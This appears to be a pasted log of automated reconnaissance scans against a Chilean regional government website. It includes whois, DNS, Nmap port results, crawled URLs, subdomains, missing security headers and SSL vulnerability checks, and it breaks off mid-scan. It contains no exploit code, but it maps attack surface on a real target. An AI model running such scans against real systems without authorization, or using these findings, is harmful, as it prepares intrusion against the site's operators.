· 6 years ago · Mar 12, 2020, 10:24 PM
1#####################################################################################################################################
2======================================================================================================================================
3 Hostname www.dellibertador.cl ISP CTC. CORP S.A. (TELEFONICA EMPRESAS)
4Continent South America Flag
5CL
6Country Chile Country Code CL
7Region Santiago Metropolitan Local time 12 Mar 2020 16:42 -03
8City Santiago Postal Code Unknown
9IP Address 200.54.230.247 Latitude -33.451
10 Longitude -70.665
11=====================================================================================================================================
12#####################################################################################################################################
13> www.dellibertador.cl
14Server: 10.101.0.243
15Address: 10.101.0.243#53
16
17Non-authoritative answer:
18www.dellibertador.cl canonical name = dellibertador.cl.
19Name: dellibertador.cl
20Address: 200.54.230.247
21>
22#####################################################################################################################################
23Domain name: dellibertador.cl
24Registrant name: GOBIERNO REGIONAL VI REGION DEL LI BERTADOR B O"HIGGINS
25Registrant organisation:
26Registrar name: NIC Chile
27Registrar URL: https://www.nic.cl
28Creation date: 2010-05-20 14:36:18 CLST
29Expiration date: 2021-06-19 10:36:01 CLST
30Name server: ns.dellibertador.cl (200.54.230.247)
31Name server: secundario.nic.cl
32#####################################################################################################################################
33[+] Target : www.dellibertador.cl
34
35[+] IP Address : 200.54.230.247
36
37[+] Headers :
38
39[+] Server : nginx
40[+] Date : Thu, 12 Mar 2020 20:30:24 GMT
41[+] Content-Type : text/html
42[+] Content-Length : 166
43[+] Connection : keep-alive
44[+] X-Accel-Version : 0.01
45[+] Last-Modified : Tue, 24 Dec 2019 03:09:05 GMT
46[+] ETag : "a6-59a6a77779c61"
47[+] Accept-Ranges : bytes
48[+] X-Powered-By : PleskLin
49
50[+] SSL Certificate Information :
51
52[+] commonName : dellibertador.cl
53[+] countryName : US
54[+] organizationName : Let's Encrypt
55[+] commonName : Let's Encrypt Authority X3
56[+] Version : 3
57[+] Serial Number : 03CCAE88BB2EB0A9051E939D4459B9C21783
58[+] Not Before : Feb 6 20:30:20 2020 GMT
59[+] Not After : May 6 20:30:20 2020 GMT
60[+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
61[+] subject Alt Name : (('DNS', 'dellibertador.cl'), ('DNS', 'www.dellibertador.cl'))
62[+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)
63
64[+] Whois Lookup :
65
66[+] NIR : None
67[+] ASN Registry : lacnic
68[+] ASN : 16629
69[+] ASN CIDR : 200.54.0.0/16
70[+] ASN Country Code : CL
71[+] ASN Date : 1999-11-09
72[+] ASN Description : CTC. CORP S.A. (TELEFONICA EMPRESAS), CL
73[+] cidr : 200.54.230.0/24
74[+] name : None
75[+] handle : ALS17
76[+] range : 200.54.230/24
77[+] description : CL-TEEMSR-LACNIC
78[+] country : CL
79[+] state : None
80[+] city : None
81[+] address : None
82[+] postal_code : None
83[+] emails : ['technical.tie@GMAIL.COM']
84[+] created : 20070628
85[+] updated : 20070628
86
87[+] Crawling Target...
88
89[+] Looking for robots.txt........[ Not Found ]
90[+] Looking for sitemap.xml.......[ Not Found ]
91[+] Extracting CSS Links..........[ 0 ]
92[+] Extracting Javascript Links...[ 0 ]
93[+] Extracting Internal Links.....[ 0 ]
94[+] Extracting External Links.....[ 0 ]
95[+] Extracting Images.............[ 0 ]
96
97[+] Total Links Extracted : 0
98
99[+] Completed!
100#####################################################################################################################################
101[i] Scanning Site: https://www.dellibertador.cl
102
103
104
105B A S I C I N F O
106====================
107
108
109[+] Site Title: Gore O'Higgins
110[+] IP address: 200.54.230.247
111[+] Web Server: nginx
112[+] CMS: Could Not Detect
113[+] Cloudflare: Not Detected
114[+] Robots File: Could NOT Find robots.txt!
115
116
117
118
119W H O I S L O O K U P
120========================
121
122 %%
123%% This is the NIC Chile Whois server (whois.nic.cl).
124%%
125%% Rights restricted by copyright.
126%% See https://www.nic.cl/normativa/politica-publicacion-de-datos-cl.pdf
127%%
128
129Domain name: dellibertador.cl
130Registrant name: GOBIERNO REGIONAL VI REGION DEL LI BERTADOR B O"HIGGINS
131Registrant organisation:
132Registrar name: NIC Chile
133Registrar URL: https://www.nic.cl
134Creation date: 2010-05-20 14:36:18 CLST
135Expiration date: 2021-06-19 10:36:01 CLST
136Name server: ns.dellibertador.cl (200.54.230.247)
137Name server: secundario.nic.cl
138
139%%
140%% For communication with domain contacts please use website.
141%% See https://www.nic.cl/registry/Whois.do?d=dellibertador.cl
142%%
143
144
145
146
147G E O I P L O O K U P
148=========================
149
150[i] IP Address: 200.54.230.247
151[i] Country: Chile
152[i] State: Santiago Metropolitan
153[i] City: Santiago
154[i] Latitude: -33.4513
155[i] Longitude: -70.6653
156
157
158
159
160H T T P H E A D E R S
161=======================
162
163
164[i] HTTP/1.1 200 OK
165[i] Server: nginx
166[i] Date: Thu, 12 Mar 2020 20:31:08 GMT
167[i] Content-Type: text/html
168[i] Content-Length: 166
169[i] Connection: close
170[i] X-Accel-Version: 0.01
171[i] Last-Modified: Tue, 24 Dec 2019 03:09:05 GMT
172[i] ETag: "a6-59a6a77779c61"
173[i] Accept-Ranges: bytes
174[i] X-Powered-By: PleskLin
175
176
177
178
179D N S L O O K U P
180===================
181
182dellibertador.cl. 21599 IN A 200.54.230.247
183dellibertador.cl. 21599 IN NS secundario.nic.cl.
184dellibertador.cl. 21599 IN NS ns.dellibertador.cl.
185dellibertador.cl. 21599 IN MX 10 magic-01.tdata.cloud.
186dellibertador.cl. 21599 IN MX 10 magic-02.tdata.cloud.
187dellibertador.cl. 21599 IN SOA ns.dellibertador.cl. carlos\.carrasco.dellibertador.gob.cl. 2019122702 10800 3600 604800 10800
188
189
190
191
192S U B N E T C A L C U L A T I O N
193====================================
194
195Address = 200.54.230.247
196Network = 200.54.230.247 / 32
197Netmask = 255.255.255.255
198Broadcast = not needed on Point-to-Point links
199Wildcard Mask = 0.0.0.0
200Hosts Bits = 0
201Max. Hosts = 1 (2^0 - 0)
202Host Range = { 200.54.230.247 - 200.54.230.247 }
203
204
205
206N M A P P O R T S C A N
207============================
208
209Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-12 20:31 UTC
210Nmap scan report for dellibertador.cl (200.54.230.247)
211Host is up (0.13s latency).
212rDNS record for 200.54.230.247: plesk.tdata.cloud
213
214PORT STATE SERVICE
21521/tcp open ftp
21622/tcp open ssh
21780/tcp open http
218443/tcp open https
219
220Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
221
222
223
224S U B - D O M A I N F I N D E R
225==================================
226
227
228[i] Total Subdomains Found : 2
229
230[+] Subdomain: postulaciones.dellibertador.cl
231[-] IP: 200.54.230.240
232
233[+] Subdomain: ns.dellibertador.cl
234[-] IP: 200.54.230.247
235#####################################################################################################################################
236[+] Starting At 2020-03-12 16:32:01.930793
237[+] Collecting Information On: https://www.dellibertador.cl/d3/
238[#] Status: 200
239--------------------------------------------------
240[#] Web Server Detected: nginx
241[#] X-Powered-By: PHP/7.3.15, PleskLin
242[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
243- Server: nginx
244- Date: Thu, 12 Mar 2020 20:32:00 GMT
245- Content-Type: text/html; charset=utf-8
246- Content-Length: 43589
247- Connection: keep-alive
248- X-Powered-By: PHP/7.3.15, PleskLin
249- Expires: Wed, 17 Aug 2005 00:00:00 GMT
250- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
251- Pragma: no-cache
252- Set-Cookie: f4528e99b1258780d7d15999091df8c3=a0t8q4m4ptp1een617u7qn5ip1; path=/; HttpOnly
253- X-Content-Type-Options: nosniff
254- Last-Modified: Thu, 12 Mar 2020 20:32:00 GMT
255--------------------------------------------------
256[#] Finding Location..!
257[#] status: success
258[#] country: Chile
259[#] countryCode: CL
260[#] region: RM
261[#] regionName: Santiago Metropolitan
262[#] city: Santiago
263[#] zip: 34033
264[#] lat: -33.4513
265[#] lon: -70.6653
266[#] timezone: America/Santiago
267[#] isp: TEEMSR-LACNIC
268[#] org: CL-TEEMSR-LACNIC
269[#] as: AS16629 CTC. CORP S.A. (TELEFONICA EMPRESAS)
270[#] query: 200.54.230.247
271--------------------------------------------------
272[x] Didn't Detect WAF Presence on: https://www.dellibertador.cl/d3/
273--------------------------------------------------
274[#] Starting Reverse DNS
275[-] Failed ! Fail
276--------------------------------------------------
277[!] Scanning Open Port
278[#] 21/tcp open ftp
279[#] 22/tcp open ssh
280[#] 25/tcp open smtp
281[#] 53/tcp open domain
282[#] 80/tcp open http
283[#] 110/tcp open pop3
284[#] 143/tcp open imap
285[#] 443/tcp open https
286[#] 465/tcp open smtps
287[#] 587/tcp open submission
288[#] 993/tcp open imaps
289[#] 995/tcp open pop3s
290[#] 8443/tcp open https-alt
291--------------------------------------------------
292[+] Getting SSL Info
293{'OCSP': ('http://ocsp.int-x3.letsencrypt.org',),
294 'caIssuers': ('http://cert.int-x3.letsencrypt.org/',),
295 'issuer': ((('countryName', 'US'),),
296 (('organizationName', "Let's Encrypt"),),
297 (('commonName', "Let's Encrypt Authority X3"),)),
298 'notAfter': 'May 6 20:30:20 2020 GMT',
299 'notBefore': 'Feb 6 20:30:20 2020 GMT',
300 'serialNumber': '03CCAE88BB2EB0A9051E939D4459B9C21783',
301 'subject': ((('commonName', 'dellibertador.cl'),),),
302 'subjectAltName': (('DNS', 'dellibertador.cl'),
303 ('DNS', 'www.dellibertador.cl')),
304 'version': 3}
305-----BEGIN CERTIFICATE-----
306MIIFWjCCBEKgAwIBAgISA/wesNCtqevzo/Z7kZJSbt/lMA0GCSqGSIb3DQEBCwUA
307MEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQD
308ExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzAeFw0yMDAxMjgxNTQ0MzJaFw0y
309MDA0MjcxNTQ0MzJaMBwxGjAYBgNVBAMTEXBsZXNrLnRkYXRhLmNsb3VkMIIBIjAN
310BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtCPla93KvX9syc8jIBq7xv4i3slo
311jjCuWaF9C1jaXkHUGcrpFcvApcQlY9lcbaHKTcTbyZ0M6PCEwwyQHwyrm1bWkSaV
3122jee+fPZrYazZTA4uQsZUefMDppV5ygTYxET9iFX3ijuYSi+8/6SZcsMqjKeWj/N
313iXLCTiyu/s0z/XTxRxXZoGAllbGiHAbfk98sJfyMtTD4IcxibBIwMd2ugGhmsSSA
314rw/UFN6ItUkBwMxD93BWlvoaQ6G54jtqueYj0X2f5zi5G/l555I7DhXJ8u28/0cA
315w7EYDF8pZnwXhizpg6fghwzsPPFrveQNZffiuOKf/LK+ZxhZw4/2nhLFaQIDAQAB
316o4ICZjCCAmIwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggr
317BgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBS0pNOrGRbh9+78toKs4NLE
318zOGDVTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcB
319AQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlw
320dC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlw
321dC5vcmcvMBwGA1UdEQQVMBOCEXBsZXNrLnRkYXRhLmNsb3VkMEwGA1UdIARFMEMw
322CAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9j
323cHMubGV0c2VuY3J5cHQub3JnMIIBBAYKKwYBBAHWeQIEAgSB9QSB8gDwAHYAXqdz
324+d9WwOe1Nkh90EngMnqRmgyEoRIShBh1loFxRVgAAAFv7QpMzwAABAMARzBFAiA9
325OvKV2PUyQhsMDTZUo/sYSWJ5pbPqNLkFiy+AawGuJQIhANwRvhiFccQ/PeeeqA3M
326pbKNGqhKH8vXIIp6bOw9Fd3HAHYAB7dcG+V9aP/xsMYdIxXHuuZXfFeUt2ruvGE6
327GmnTohwAAAFv7QpNDwAABAMARzBFAiAjdGeZpRpKucoCj7WtCZ8p/UwsLAKQS7k8
328veW7awKAEwIhANozvVtU++/wEsXb1p0xrz7y/iZ2O7HGX54E/XEGRovCMA0GCSqG
329SIb3DQEBCwUAA4IBAQBFp/9RwS5OJc40Utyu32bB6FXu7pf4B1aKqr0z2LgCVOFQ
3300Kf3pZmePkiZKzW6/HlFY5K8mkf+KJd6gRKVfMwegVk2ySziDsBstjHMNoYSFNk7
331vXSyqPIsAhSJbm8ag4jME/xeNE+vM/Z8uovRX5EQa/NBp/DJj25U+ky5tmxUBIuq
332qp0FkS1RVGU60q/H0E5E20tn6+57rDhE2Noq//UdxEx6c5NQoUi6MA1rnM0Rx8T/
333ivISDBtLdgUpORWpz35FlOp+jLBInttlrONaBX8p2QVhjFrGaa+PfJ5RfXf6RB1O
334s5+UG+MmettB1/f38E0oc0i90zawYtQsE+n9lwaF
335-----END CERTIFICATE-----
336
337--------------------------------------------------
338[+] Collecting Information Disclosure!
339[#] Detecting sitemap.xml file
340[-] sitemap.xml file not Found!?
341[#] Detecting robots.txt file
342[!] robots.txt File Found: https://www.dellibertador.cl/d3//robots.txt
343[#] Detecting GNU Mailman
344[-] GNU Mailman App Not Detected!?
345--------------------------------------------------
346[+] Crawling Url Parameter On: https://www.dellibertador.cl/d3/
347--------------------------------------------------
348[#] Searching Html Form !
349[-] No Html Form Found!?
350--------------------------------------------------
351[!] Found 18 dom parameter
352[#] https://www.dellibertador.cl/d3//#
353[#] https://www.dellibertador.cl/d3//#
354[#] https://www.dellibertador.cl/d3//#
355[#] https://www.dellibertador.cl/d3//#
356[#] https://www.dellibertador.cl/d3//#
357[#] https://www.dellibertador.cl/d3//#
358[#] https://www.dellibertador.cl/d3//#
359[#] https://www.dellibertador.cl/d3//#
360[#] https://www.dellibertador.cl/d3//#
361[#] https://www.dellibertador.cl/d3//#
362[#] https://www.dellibertador.cl/d3//#
363[#] https://www.dellibertador.cl/d3//#
364[#] https://www.dellibertador.cl/d3//#
365[#] https://www.dellibertador.cl/d3//#
366[#] https://www.dellibertador.cl/d3//#
367[#] https://www.dellibertador.cl/d3//#
368[#] https://www.dellibertador.cl/d3//#
369[#] https://www.dellibertador.cl/d3//#modal_5e6a9c407fc512758
370--------------------------------------------------
371[!] 4 Internal Dynamic Parameter Discovered
372[+] https://www.dellibertador.cl/d3///d3/?format=feed&type=rss
373[+] https://www.dellibertador.cl/d3///d3/?format=feed&type=atom
374[+] https://www.dellibertador.cl/d3///d3/plugins/system/jce/css/content.css?e93e50af6dea681358f3c4146b58341f
375[+] https://www.dellibertador.cl/d3///d3/plugins/system/jcemediabox/css/jcemediabox.min.css?9d108330040bd2b7386ad9c4cf8105fc
376--------------------------------------------------
377[!] 2 External Dynamic Parameter Discovered
378[#] https://www.portaltransparencia.cl/PortalPdT/web/guest/directorio-de-organismos-regulados?p_p_id=pdtorganismos_WAR_pdtorganismosportlet&orgcode=99c759f4a64f4316883cb105c85a8fd6
379[#] https://www.portaltransparencia.cl/PortalPdT/pdtta?codOrganismo=AB082
380--------------------------------------------------
381[!] 52 Internal links Discovered
382[+] https://www.dellibertador.cl/d3/
383[+] https://www.dellibertador.cl/d3///d3/templates/g5_hydrogen/favicon.ico
384[+] https://www.dellibertador.cl/d3///d3/media/modals/css/bootstrap.min.css
385[+] https://www.dellibertador.cl/d3///d3/templates/g5_hydrogen/custom/css/jluikit.min.css
386[+] https://www.dellibertador.cl/d3///d3/media/gantry5/assets/css/font-awesome.min.css
387[+] https://www.dellibertador.cl/d3///d3/media/gantry5/engines/nucleus/css-compiled/nucleus.css
388[+] https://www.dellibertador.cl/d3///d3/templates/g5_hydrogen/custom/css-compiled/hydrogen_9.css
389[+] https://www.dellibertador.cl/d3///d3/media/gantry5/assets/css/bootstrap-gantry.css
390[+] https://www.dellibertador.cl/d3///d3/media/gantry5/engines/nucleus/css-compiled/joomla.css
391[+] https://www.dellibertador.cl/d3///d3/media/jui/css/icomoon.css
392[+] https://www.dellibertador.cl/d3///d3/templates/g5_hydrogen/custom/css-compiled/hydrogen-joomla_9.css
393[+] https://www.dellibertador.cl/d3///d3/templates/g5_hydrogen/custom/css-compiled/custom_9.css
394[+] https://www.dellibertador.cl/d3///d3/media/gantry5/engines/nucleus/css/nucleus-ie9.css
395[+] https://www.dellibertador.cl/d3///d3
396[+] https://www.dellibertador.cl/d3///d3/
397[+] https://www.dellibertador.cl/d3///d3/intendente
398[+] https://www.dellibertador.cl/d3///d3/gobierno-regional/antecedentes-generales
399[+] https://www.dellibertador.cl/d3///d3/gobierno-regional/funciones-y-atribuciones
400[+] https://www.dellibertador.cl/d3///d3/gobierno-regional/sagore
401[+] https://www.dellibertador.cl/d3///d3/gobierno-regional/organigrama
402[+] https://www.dellibertador.cl/d3///d3/consejo-regional/consejeros-regionales
403[+] https://www.dellibertador.cl/d3///d3/consejo-regional/que-es-el-consejo-regional
404[+] https://www.dellibertador.cl/d3///d3/consejo-regional/funciones-del-consejo-regional
405[+] https://www.dellibertador.cl/d3///d3/consejo-regional/secretaria-ejecutiva
406[+] https://www.dellibertador.cl/d3///d3/consejo-regional/comisiones
407[+] https://www.dellibertador.cl/d3///d3/inversion-regional/anteproyecto-regional-de-inversiones-ari
408[+] https://www.dellibertador.cl/d3///d3/inversion-regional/programa-publico-de-inversiones-regionales-propir
409[+] https://www.dellibertador.cl/d3///d3/inversion-regional/terminologia-inversion-publica
410[+] https://www.dellibertador.cl/d3///d3/fndr/fic
411[+] https://www.dellibertador.cl/d3///d3/fndr/fril
412[+] https://www.dellibertador.cl/d3///d3/fndr/6-cultura-deporte-seguridad
413[+] https://www.dellibertador.cl/d3///d3/fndr/chatarrizacion
414[+] https://www.dellibertador.cl/d3///d3/transparencia
415[+] https://www.dellibertador.cl/d3///d3/region
416[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore
417[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/86-o-higgins-uso-de-dron-permitio-desbaratar-banda-de-traficantes-e-incautar-29-armas-de-fuego
418[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/86-o-higgins-uso-de-dron-permitio-desbaratar-banda-de-traficantes-e-incautar-29-armas-de-fuego
419[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/85-gobierno-regional-aprueba-recursos-para-importantes-proyectos-en-nancagua-san-vicente-y-rancagua
420[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/85-gobierno-regional-aprueba-recursos-para-importantes-proyectos-en-nancagua-san-vicente-y-rancagua
421[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/84-gobierno-regional-confirma-continuidad-de-programa-de-intervencion-de-caderas
422[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/84-gobierno-regional-confirma-continuidad-de-programa-de-intervencion-de-caderas
423[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/83-liderados-por-salud-refuerzan-trabajo-intersectorial-para-enfrentar-el-coronavirus-en-la-region-de-o-higgins
424[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/83-liderados-por-salud-refuerzan-trabajo-intersectorial-para-enfrentar-el-coronavirus-en-la-region-de-o-higgins
425[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/82-intendente-masferrer-participa-en-videoconferencia-del-presidente-pinera-con-intendentes-de-todo-chile-por-coronavirus
426[+] https://www.dellibertador.cl/d3///d3/noticias/noticias-gore/82-intendente-masferrer-participa-en-videoconferencia-del-presidente-pinera-con-intendentes-de-todo-chile-por-coronavirus
427[+] https://www.dellibertador.cl/d3/fndr/fic
428[+] https://www.dellibertador.cl/d3/fndr/fril
429[+] https://www.dellibertador.cl/d3/fndr/6-cultura-deporte-seguridad
430[+] https://www.dellibertador.cl/d3///d3/component/content/article/1
431[+] https://www.dellibertador.cl/d3///d3/images/docs/2020/plan_recursos_hidricos_2020–2029.pdf
432[+] https://www.dellibertador.cl/d3///d3/images/docs/2020/fondo_presidente.pdf
433[+] https://www.dellibertador.cl/d3/fndr/6-cultura-deporte-seguridad
434--------------------------------------------------
435[!] 6 External links Discovered
436[#] https://es-la.facebook.com/intendencia.ohiggins.9
437[#] https://twitter.com/intendenciaLBO
438[#] http://www.youtube.com/user/tvohiggins
439[#] https://www.instagram.com/intendencia.ohiggins/
440[#] https://www.leylobby.gob.cl/instituciones/AB082
441[#] https://www.gob.cl/agendasocial/
442--------------------------------------------------
443[#] Mapping Subdomain..
444[-] No Any Subdomain Found
445[!] Found 0 Subdomain
446--------------------------------------------------
447[!] Done At 2020-03-12 16:32:50.850619
448#####################################################################################################################################
449Trying "dellibertador.cl"
450;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58105
451;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1
452
453;; QUESTION SECTION:
454;dellibertador.cl. IN ANY
455
456;; ANSWER SECTION:
457dellibertador.cl. 43200 IN SOA ns.dellibertador.cl. carlos\.carrasco.dellibertador.gob.cl. 2019122702 10800 3600 604800 10800
458dellibertador.cl. 43200 IN A 200.54.230.247
459dellibertador.cl. 43200 IN MX 10 magic-01.tdata.cloud.
460dellibertador.cl. 43200 IN MX 10 magic-02.tdata.cloud.
461dellibertador.cl. 669 IN NS secundario.nic.cl.
462dellibertador.cl. 669 IN NS ns.dellibertador.cl.
463
464;; ADDITIONAL SECTION:
465ns.dellibertador.cl. 669 IN A 200.54.230.247
466
467Received 243 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 163 ms
468####################################################################################################################################
469; <<>> DiG 9.11.16-2-Debian <<>> +trace dellibertador.cl any
470;; global options: +cmd
471. 5309 IN NS a.root-servers.net.
472. 5309 IN NS b.root-servers.net.
473. 5309 IN NS c.root-servers.net.
474. 5309 IN NS d.root-servers.net.
475. 5309 IN NS e.root-servers.net.
476. 5309 IN NS f.root-servers.net.
477. 5309 IN NS g.root-servers.net.
478. 5309 IN NS h.root-servers.net.
479. 5309 IN NS i.root-servers.net.
480. 5309 IN NS j.root-servers.net.
481. 5309 IN NS k.root-servers.net.
482. 5309 IN NS l.root-servers.net.
483. 5309 IN NS m.root-servers.net.
484. 5309 IN RRSIG NS 8 0 518400 20200325170000 20200312160000 33853 . r59vLobzCS++fwCVPmKaZ+xow3aZ/8Sph0fK+AfZQ5cOYRSwwOgRRDk/ LNRHUUeSvG5L7i7QKx7Gt3nfOv26ptEVZzkJG0mZU1bX2jePbvNxE9mf aW39t36yNDsUvcCb1ABaFgZ2FD1JuCIFyA1VRvG+a2inyNriO0C6+t6x C63odqgJtsNHC6ExnQLo7SpbiJLy+CZps9Y5SmPPdbZhwq1Nn7RcVW3X cfjD5K3usKhnSNqw683KJk5595DPmrhwFmEMYttB12INwXufkYdoxOeR VLkP/rd+sISLPHUkoFni//HGfLU60Dc6pVMJEiTRME7YdtsW4VZtKU63 PiOQ8g==
485;; Received 525 bytes from 10.101.0.243#53(10.101.0.243) in 316 ms
486
487cl. 172800 IN NS a.nic.cl.
488cl. 172800 IN NS cl1-tld.d-zone.ca.
489cl. 172800 IN NS c.nic.cl.
490cl. 172800 IN NS cl-ns.anycast.pch.net.
491cl. 172800 IN NS b.nic.cl.
492cl. 172800 IN NS cl2-tld.d-zone.ca.
493cl. 172800 IN NS cl1.dnsnode.net.
494cl. 86400 IN DS 21199 8 2 7D756DFFAB6D3CD9C786FF5C659954C22944FAEF9433EEE26F1D84EB 5370B394
495cl. 86400 IN RRSIG DS 8 1 86400 20200325170000 20200312160000 33853 . i88n8+Y0muERrQIrtMPa3e47PXDayD27afHpzYBGnUMtUfRKP8bTDaF4 h9CUDqTRT6WDLAAQ3ZgtbCGP31U8NZsOZ0MVgnZVmcFSPpYlY4s4ICs9 //QYw8XJmwsSK4jB4ZohTcu83IaYQ4+FU/AuwKhC+Ut8TkNpV8ZAu4oR aLhVwjOUASvQnZreT1m7LqnQO2X+my0GdUFVPv03W5eqKffjvgUybEb+ XkcOhhA3tVPr/IxsRGD/XkmtUUInnzSNoM95kKAR5ZLnl6Gt60q+Neau jZv4VNqJKcFwfe3Meozb3Ag2qxNwvqy5GUlVpKRor22M8F8ic1VCtISJ xCarCQ==
496;; Received 854 bytes from 199.9.14.201#53(b.root-servers.net) in 498 ms
497
498dellibertador.cl. 3600 IN NS ns.dellibertador.cl.
499dellibertador.cl. 3600 IN NS secundario.nic.cl.
5007F0LJ4K4DLP3QM09SP2C7U6P4GOSU7CF.cl. 900 IN NSEC3 1 1 2 CF2C58AE6CE94E8C70318BA84C2EE830 7F15SLC9A2DGJMEMHH3QC46IOGK6OBEB NS SOA TXT RRSIG DNSKEY NSEC3PARAM
5017F0LJ4K4DLP3QM09SP2C7U6P4GOSU7CF.cl. 900 IN RRSIG NSEC3 8 2 900 20200422140340 20200312193023 24384 cl. BvgSw55HLZZ9gwoKFANKsSqxKlXyS+lSL7xThY8gSRhGNF0RRhma3dBu lbS2//ojLGwawwmx3atJIInpDAkjobRJITg2uRAFR4BrW8MWowq7IZuO C0RROi4GtPUlC7ZbWmiR14w5llx9jd44YkMx3ejEZ/6Cd1JNA5nr94Vc Xss=
50215KUIS956VVDSCU97BU9DNTV1S4P9A0R.cl. 900 IN NSEC3 1 1 2 CF2C58AE6CE94E8C70318BA84C2EE830 18TE3VFB89OT6G8D1L7K2LUHFJNMDVHP NS DS RRSIG
50315KUIS956VVDSCU97BU9DNTV1S4P9A0R.cl. 900 IN RRSIG NSEC3 8 2 900 20200425060102 20200312193023 24384 cl. rpOjj4FdfQ/+Pc/Rc66aiYqee1iyBbHs/72Yoa94vyTu7LNE/EbNabva hBx1TeX2CreCMg36Cyp0wHkvuxJsD2aA7JqWbfeCULsVSFeAlJWrdeGH jvSKAUCxDFz3ghdeKhOfX2GMwPj5bpvPwf0MhD9XnQGlYMmNaBu5IpKH Ocg=
504;; Received 652 bytes from 194.146.106.34#53(cl1.dnsnode.net) in 344 ms
505
506dellibertador.cl. 86400 IN MX 10 magic-02.tdata.cloud.
507dellibertador.cl. 86400 IN MX 10 magic-01.tdata.cloud.
508dellibertador.cl. 86400 IN SOA ns.dellibertador.cl. carlos\.carrasco.dellibertador.gob.cl. 2019122702 10800 3600 604800 10800
509dellibertador.cl. 86400 IN NS ns.dellibertador.cl.
510dellibertador.cl. 86400 IN NS secundario.nic.cl.
511dellibertador.cl. 86400 IN A 200.54.230.247
512;; Received 282 bytes from 200.54.230.247#53(ns.dellibertador.cl) in 579 ms
513###################################################################################################################################
514[*] Performing General Enumeration of Domain: dellibertador.cl
515[-] DNSSEC is not configured for dellibertador.cl
516[*] SOA ns.dellibertador.cl 200.54.230.247
517[*] NS ns.dellibertador.cl 200.54.230.247
518[*] Bind Version for 200.54.230.247 b'none'
519[*] NS secundario.nic.cl 200.7.5.7
520[*] Bind Version for 200.7.5.7 b'BIND 9'
521[*] NS secundario.nic.cl 2001:1398:276:0:200:7:5:7
522[*] Bind Version for 2001:1398:276:0:200:7:5:7 b'BIND 9'
523[*] MX magic-02.tdata.cloud 200.54.230.252
524[*] MX magic-01.tdata.cloud 200.54.230.251
525[*] A dellibertador.cl 200.54.230.247
526[*] Enumerating SRV Records
527[-] No SRV Records Found for dellibertador.cl
528[+] 0 Records Found
529#####################################################################################################################################
530 AVAILABLE PLUGINS
531 -----------------
532
533 OpenSslCipherSuitesPlugin
534 OpenSslCcsInjectionPlugin
535 SessionResumptionPlugin
536 SessionRenegotiationPlugin
537 CompressionPlugin
538 CertificateInfoPlugin
539 FallbackScsvPlugin
540 HttpHeadersPlugin
541 EarlyDataPlugin
542 HeartbleedPlugin
543 RobotPlugin
544
545
546
547 CHECKING HOST(S) AVAILABILITY
548 -----------------------------
549
550 200.54.230.247:443 => 200.54.230.247
551
552
553
554
555 SCAN RESULTS FOR 200.54.230.247:443 - 200.54.230.247
556 ----------------------------------------------------
557
558 * OpenSSL Heartbleed:
559 OK - Not vulnerable to Heartbleed
560
561 * Certificate Information:
562 Content
563 SHA1 Fingerprint: 70b903996aebdd284a52f2131ea17dea8587d085
564 Common Name: plesk.tdata.cloud
565 Issuer: Let's Encrypt Authority X3
566 Serial Number: 347128809175978140227794066069699387383781
567 Not Before: 2020-01-28 15:44:32
568 Not After: 2020-04-27 15:44:32
569 Signature Algorithm: sha256
570 Public Key Algorithm: RSA
571 Key Size: 2048
572 Exponent: 65537 (0x10001)
573 DNS Subject Alternative Names: ['plesk.tdata.cloud']
574
575 Trust
576 Hostname Validation: FAILED - Certificate does NOT match 200.54.230.247
577 Android CA Store (9.0.0_r9): OK - Certificate is trusted
578 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):OK - Certificate is trusted
579 Java CA Store (jdk-12.0.1): OK - Certificate is trusted
580 Mozilla CA Store (2019-03-14): OK - Certificate is trusted
581 Windows CA Store (2019-05-27): OK - Certificate is trusted
582 Symantec 2018 Deprecation: WARNING: Certificate distrusted by Google and Mozilla on September 2018
583 Received Chain: plesk.tdata.cloud --> Let's Encrypt Authority X3
584 Verified Chain: plesk.tdata.cloud --> Let's Encrypt Authority X3 --> DST Root CA X3
585 Received Chain Contains Anchor: OK - Anchor certificate not sent
586 Received Chain Order: OK - Order is valid
587 Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
588
589 Extensions
590 OCSP Must-Staple: NOT SUPPORTED - Extension not found
591 Certificate Transparency: WARNING - Only 2 SCTs included but Google recommends 3 or more
592
593 OCSP Stapling
594 NOT SUPPORTED - Server did not send back an OCSP response
595
596 * OpenSSL CCS Injection:
597 OK - Not vulnerable to OpenSSL CCS injection
598
599 * TLSV1 Cipher Suites:
600 Server rejected all cipher suites.
601
602 * TLSV1_1 Cipher Suites:
